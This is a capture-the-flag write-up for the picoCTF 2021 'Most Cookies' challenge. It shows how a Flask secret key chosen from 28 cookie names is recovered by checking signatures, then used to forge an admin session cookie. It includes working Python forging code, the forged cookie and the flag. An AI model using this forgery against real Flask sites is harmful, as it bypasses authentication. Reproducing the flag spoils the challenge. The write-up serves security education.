# Most Cookies

## Problem

> Alright, enough of using my own encryption. Flask session cookies should be plenty secure! server.py <http://mercury.picoctf.net:18835/>

* [server.py](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/server.py)

## Solution

1. Looking at the [server script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/server.py) we can see that the app’s secret key is set to a random cookie name:

   ```python
   cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
   app.secret_key = random.choice(cookie_names)
   ```
2. The app’s secret key is used to sign the Flask session cookie so that it cannot be modified without detection. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until one successfully verifies the cookie’s signature.
3. So, the first step is to go to the website and copy a session cookie: `eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI`
4. We can write a [script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/script.py) that uses the logic from Flask’s [`SecureCookieSessionInterface`](https://github.com/pallets/flask/blob/020331522be03389004e012e008ad7db81ef8116/src/flask/sessions.py#L304) to decode and encode cookies.
5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the [server code](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/server.py).

   ```python
   check = session["very_auth"]
   if check == "admin":
       resp = make_response(render_template("flag.html", value=flag_value, title=title))
   ```

   So, we need to store `{"very_auth": "admin"}` in the cookie.
6. Running the solve [script](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/Most%20Cookies/script.py) will try each secret key and, once it finds the key that verifies the known cookie, it will sign the above cookie data with it.

   ```
   Secret Key: whoopie pie
   Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk
   ```
7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.
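As an added illustration of steps 4 and 6 (this is not the write-up’s own script), the block below reimplements, with only the standard library, the signing scheme Flask’s `SecureCookieSessionInterface` delegates to itsdangerous (salt `cookie-session`, HMAC-SHA1 key derivation, base64url without padding, plain Unix timestamp as seen in the captured cookie) and then checks the captured cookie against each of the 28 candidate keys. Function names (`sign_session`, `verify_session`, `recover_key`) are mine, and the zlib compression itsdangerous applies to long payloads is deliberately not handled.

```python
# Added example, not the write-up's script: standard-library reimplementation
# of Flask session signing (itsdangerous URLSafeTimedSerializer as configured
# by SecureCookieSessionInterface). Short, uncompressed payloads only.
import base64
import hashlib
import hmac
import json
import time

SALT = b"cookie-session"
COOKIE_NAMES = [  # the 28 candidate secret keys, copied from server.py
    "snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread",
    "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter",
    "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune",
    "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white",
    "white chocolate macadamia"]
# Session cookie captured from the challenge site (quoted in the write-up above).
KNOWN_COOKIE = "eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI"

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def signature(secret, signed_part):
    # Flask uses key_derivation="hmac": signing key = HMAC-SHA1(secret, salt),
    # then the cookie MAC is HMAC-SHA1(signing key, "<payload>.<timestamp>").
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return b64e(hmac.new(key, signed_part.encode(), hashlib.sha1).digest())

def sign_session(data, secret, ts=None):
    payload = b64e(json.dumps(data, separators=(",", ":")).encode())
    ts = int(time.time()) if ts is None else ts  # plain Unix time, big-endian bytes
    body = payload + "." + b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return body + "." + signature(secret, body)

def verify_session(cookie, secret):
    # Returns the session dict if the MAC is valid under `secret`, else None.
    payload, stamp, sig = cookie.split(".")
    if not hmac.compare_digest(sig, signature(secret, payload + "." + stamp)):
        return None
    return json.loads(b64d(payload))

def recover_key(cookie, candidates):
    # Key-space audit: a secret drawn from a 28-word list falls to 28 MAC checks.
    return next((k for k in candidates if verify_session(cookie, k) is not None), None)

if __name__ == "__main__":
    key = recover_key(KNOWN_COOKIE, COOKIE_NAMES)
    print("Secret Key:", key)
    if key is not None:
        print("Admin Cookie:", sign_session({"very_auth": "admin"}, key))
```

The fix on the server side is a secret key with real entropy (for example `secrets.token_bytes(32)`), which turns the 28-guess search into an infeasible one.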

### Flag

`picoCTF{pwn_4ll_th3_cook1E5_743c20eb}`
